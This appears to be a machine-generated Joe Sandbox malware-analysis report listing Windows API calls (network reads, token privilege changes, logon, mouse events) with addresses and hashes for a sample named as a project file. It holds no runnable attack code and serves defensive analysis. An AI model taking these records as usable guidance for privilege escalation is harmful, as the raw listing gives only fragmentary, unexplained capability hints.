                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: ($|
                                                        • API String ID: 1659193697-1631851259
                                                        • Opcode ID: 8a5278686ee60d7f05ac27ced6a8d85a00fef8e1afaf9d9f9d47799e01dc4ff5
                                                        • Instruction ID: 35776651ed90fb4f6d3b26939bab37c7180ef77243daaa792fb321c0e752920a
                                                        • Opcode Fuzzy Hash: 8a5278686ee60d7f05ac27ced6a8d85a00fef8e1afaf9d9f9d47799e01dc4ff5
                                                        • Instruction Fuzzy Hash: 62322475A007059FDB28CF19C4819AAB7F5FF58320B15C46EE89ADB3A1E770E981CB40
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0083180A,00000000), ref: 008323E1
                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00832418
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                        • String ID:
                                                        • API String ID: 599397726-0
                                                        • Opcode ID: 32f75198ca6c79ba9cb24eafa6a7ad59faf2cb772ad3222fe69275043347fee7
                                                        • Instruction ID: 9c7d5bb2cefe084122c6c88fd7bfa0193931e451293e61d636da44a3ab3b1d61
                                                        • Opcode Fuzzy Hash: 32f75198ca6c79ba9cb24eafa6a7ad59faf2cb772ad3222fe69275043347fee7
                                                        • Instruction Fuzzy Hash: 1B41F271A00209FFEB10DE95DC85EBBB7ACFB80328F10406EF605E6251EA759E4196E4
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0082B40B
                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0082B465
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0082B4B2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$DiskFreeSpace
                                                        • String ID:
                                                        • API String ID: 1682464887-0
                                                        • Opcode ID: 17160621420bd77103bf742e3e60ad3c0a4c1bf0980998fbde76d9c3110f2e75
                                                        • Instruction ID: 5e157d15a69eab5a674804b1a511f3bcd13d4cc8efe2409a13df1e935af46ab2
                                                        • Opcode Fuzzy Hash: 17160621420bd77103bf742e3e60ad3c0a4c1bf0980998fbde76d9c3110f2e75
                                                        • Instruction Fuzzy Hash: 2D214F35A00618DFCB00EF55E884EEDBBB8FF49314F1480ADE905EB251DB319955CB51
                                                        APIs
                                                          • Part of subcall function 007E0DB6: std::exception::exception.LIBCMT ref: 007E0DEC
                                                          • Part of subcall function 007E0DB6: __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0081882B
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00818858
                                                        • GetLastError.KERNEL32 ref: 00818865
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                        • String ID:
                                                        • API String ID: 1922334811-0
                                                        • Opcode ID: dc63f804c6d337c6d400934d82478ad038873365a2816aba9506adeafbc289ff
                                                        • Instruction ID: 9c492a7b25786af304a2f4aa74d4137b16e5530e9d65e452a64e616544c3000a
                                                        • Opcode Fuzzy Hash: dc63f804c6d337c6d400934d82478ad038873365a2816aba9506adeafbc289ff
                                                        • Instruction Fuzzy Hash: AA116DB2514205EFE718EFA5DC86D6BB7ACFF45710B20852EF45697242EB70AC808B60
                                                        APIs
                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00818774
                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0081878B
                                                        • FreeSid.ADVAPI32(?), ref: 0081879B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                        • String ID:
                                                        • API String ID: 3429775523-0
                                                        • Opcode ID: 8d7c4ae1cfa0b8862b2008c5d1747ea4c6e4f2adc83099e2ff01961e9d126f5e
                                                        • Instruction ID: 6d793d29d3c576a237b4ebfd28a7ddbe83e150836574b4835c813ff0f267c820
                                                        • Opcode Fuzzy Hash: 8d7c4ae1cfa0b8862b2008c5d1747ea4c6e4f2adc83099e2ff01961e9d126f5e
                                                        • Instruction Fuzzy Hash: D3F03C75911208BBDB00DFE49C89AAEB7BCFF08201F104469A601E2182D7715A448B50
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: P-$Variable must be of type 'Object'.
                                                        • API String ID: 0-1428129803
                                                        • Opcode ID: f4dadea1fb89a099597addfa399b62a018952c06946c63a74dee97cc5337aebb
                                                        • Instruction ID: 6440f780b7ea92ea0b37e546ab195e447ebccf7ba5ec16143c7ea606d2353e77
                                                        • Opcode Fuzzy Hash: f4dadea1fb89a099597addfa399b62a018952c06946c63a74dee97cc5337aebb
                                                        • Instruction Fuzzy Hash: FFA23875A00215CFCB24CF58C884FAEB7B6FB59314F24806DE905AB351D779AD82CB91
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0082C6FB
                                                        • FindClose.KERNEL32(00000000), ref: 0082C72B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID:
                                                        • API String ID: 2295610775-0
                                                        • Opcode ID: 6bdd7a590f13fdee1f82819d29886b5f27a74870361b4f46f87761ab8972150a
                                                        • Instruction ID: 5821a9729da997aff295e321c365683fc60433f70768ea85ddcee8c42674f8b4
                                                        • Opcode Fuzzy Hash: 6bdd7a590f13fdee1f82819d29886b5f27a74870361b4f46f87761ab8972150a
                                                        • Instruction Fuzzy Hash: 2E118E766006049FDB10DF29D849A6AF7E9FF85324F00851EF9A9C7291DB34A801CF81
                                                        APIs
                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00839468,?,0084FB84,?), ref: 0082A097
                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00839468,?,0084FB84,?), ref: 0082A0A9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 56ae68f9207c7db1f523c7b6676151bb7e43a91ef14921af6dbccf30c2c43662
                                                        • Instruction ID: 540d129538222941c894faaf419eb4e73841ccd3fab22e453152cccef248c604
                                                        • Opcode Fuzzy Hash: 56ae68f9207c7db1f523c7b6676151bb7e43a91ef14921af6dbccf30c2c43662
                                                        • Instruction Fuzzy Hash: 53F0823510522DEBDB219FA4DC48FEA776CFF09361F008269FA09D6282DA709944CBA1
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00818309), ref: 008181E0
                                                        • CloseHandle.KERNEL32(?,?,00818309), ref: 008181F2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                        • String ID:
                                                        • API String ID: 81990902-0
                                                        • Opcode ID: 92977c41fb9c3f62d29d8b306151531cdac971f130ea719f9edce0eb588f51c5
                                                        • Instruction ID: 3629edb88ee69dcb4cb48e6acf1a8ceb6b5f9465e40950952b9e023a695e7647
                                                        • Opcode Fuzzy Hash: 92977c41fb9c3f62d29d8b306151531cdac971f130ea719f9edce0eb588f51c5
                                                        • Instruction Fuzzy Hash: 0CE0B676011610EFE7262B71EC0AD77BBEAFF04310B14882EB9A684471DB62AC91DB50
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,007E8D57,?,?,?,00000001), ref: 007EA15A
                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 007EA163
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                         • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: e821eeb5e6803f612c729a7b598462019b8781df1c6ee1146c40a3fcbf2a38de
                                                        • Instruction ID: 2b6a9da793f78a6c8e9a480c9b224d18de925163942858ce10e0cf03db798678
                                                        • Opcode Fuzzy Hash: e821eeb5e6803f612c729a7b598462019b8781df1c6ee1146c40a3fcbf2a38de
                                                        • Instruction Fuzzy Hash: 58B09235054208ABCA002F91EC09F883F68FB46AAAF404024F70D84262CB625450CA91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b9fb1e2e287623fefe54761c44b7d9ee3160b09082b3bd27f48519d0b4af77f
                                                        • Instruction ID: fdec3c2181fc01328c49d8f5b7953806c18811f8701a8913481502eb260f0392
                                                        • Opcode Fuzzy Hash: 6b9fb1e2e287623fefe54761c44b7d9ee3160b09082b3bd27f48519d0b4af77f
                                                        • Instruction Fuzzy Hash: CC321222D2AF414DD7239635D832336A289AFBB3D5F15D737E81AB5DA6EB2CC4834101
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 50ab57da2f6f6e65af9b50391e0114270becc5a70ce37f8bb534dd457c7629b4
                                                        • Instruction ID: 90cf4f12d152290cf0d566da450b9e2ca791afb785338001af6af56b5f9428d6
                                                        • Opcode Fuzzy Hash: 50ab57da2f6f6e65af9b50391e0114270becc5a70ce37f8bb534dd457c7629b4
                                                        • Instruction Fuzzy Hash: 93B1F120E2AF414DD72396398871336BA5CBFBB2DAF51D71BFC2674E22EB2585834141
                                                        APIs
                                                        • __time64.LIBCMT ref: 0082889B
                                                          • Part of subcall function 007E520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00828F6E,00000000,?,?,?,?,0082911F,00000000,?), ref: 007E5213
                                                          • Part of subcall function 007E520A: __aulldiv.LIBCMT ref: 007E5233
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                        • String ID:
                                                        • API String ID: 2893107130-0
                                                        • Opcode ID: 5ccdeb3ec6865b642a6b06cf147b4a1e570485297628969d6da0ed8b7fe8b3f1
                                                        • Instruction ID: 63343155a952f6d6f9b22d2a0ca00ed65df6679c5ee47655180262df5f74bd73
                                                        • Opcode Fuzzy Hash: 5ccdeb3ec6865b642a6b06cf147b4a1e570485297628969d6da0ed8b7fe8b3f1
                                                        • Instruction Fuzzy Hash: AF21D272625520CBC729CF29D841A52B3E1FFA5310F688E6CD1F5CB2C0DA34B945CB94
                                                        APIs
                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00824C4A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: mouse_event
                                                        • String ID:
                                                        • API String ID: 2434400541-0
                                                        • Opcode ID: 9a2e5a144650ff2718a5e2f7c1599cf571cf4bf767a0a9f3762c45f610d0199f
                                                        • Instruction ID: 2ffd097f6c893d787fcc770de62ef2c632d675b980d5dc9dcd10d40625722230
                                                        • Opcode Fuzzy Hash: 9a2e5a144650ff2718a5e2f7c1599cf571cf4bf767a0a9f3762c45f610d0199f
                                                        • Instruction Fuzzy Hash: 5FD09EA516563D79ED1C0768BE1FF7A1548F34179AFD5B1497601CA0C2ECA09CC4A531
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00818389), ref: 008187D1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: b6965b1c624f332cbbf8b1b3595142fe7396d0572caa3bd5338ab95b0e149681
                                                        • Instruction ID: fbbfbb7a763d85a9b61823745e5bfa81127cc97844c676814173933b0fef93ba
                                                        • Opcode Fuzzy Hash: b6965b1c624f332cbbf8b1b3595142fe7396d0572caa3bd5338ab95b0e149681
                                                        • Instruction Fuzzy Hash: 86D05E3226090EABEF018EA4DC01EAF3B69EB04B01F408111FE15C50A1C775D835EB60
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007EA12A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 5f1540a85582dd52ddf7a5adb277767a0498ee93f106fe9f361378ce79962cf2
                                                        • Instruction ID: f63e4b2fa9f22f18c7bf24c63609cd07ce08dde969213056081e26e727c92e02
                                                        • Opcode Fuzzy Hash: 5f1540a85582dd52ddf7a5adb277767a0498ee93f106fe9f361378ce79962cf2
                                                        • Instruction Fuzzy Hash: BFA0123000010CA78A001F41EC048447F5CE601594B004020F50C40122873254108580
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df0e86ddb81e1b9b6121eac8a282a3d08f597f8cecac8757fa9a6fcdedff8def
                                                        • Instruction ID: bd607d7285e37449cd0a896dc8364c5c462df5fe31e18cd6ec17900c06b87244
                                                        • Opcode Fuzzy Hash: df0e86ddb81e1b9b6121eac8a282a3d08f597f8cecac8757fa9a6fcdedff8def
                                                        • Instruction Fuzzy Hash: A0224530604506CBCF788A64C4A47BC77B5FF81344F68806BD996CB696EB78EED1C642
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction ID: b247fd32c0bcbec3375277c048a03a336cf6ae2772b29a1ebf3cb8b454f36fd2
                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                        • Instruction Fuzzy Hash: 82C185322060D30ADF2D863B883503EBAA55EA67B135A075DD4B3CF5D5EE28C976D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction ID: f32b71319f1f8fbbabbc7fd6d8e5b815a5577d1602158a7855f16ff9373e6461
                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                        • Instruction Fuzzy Hash: FCC1C5322060D309DF2D863BC83503EBBA55EA67B135A076DD4B2DF4D6EE28C975D620
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                        • Instruction ID: 6a5681effb3431e58ecf07a8096dbc24831842a5304f682e1780be659596f569
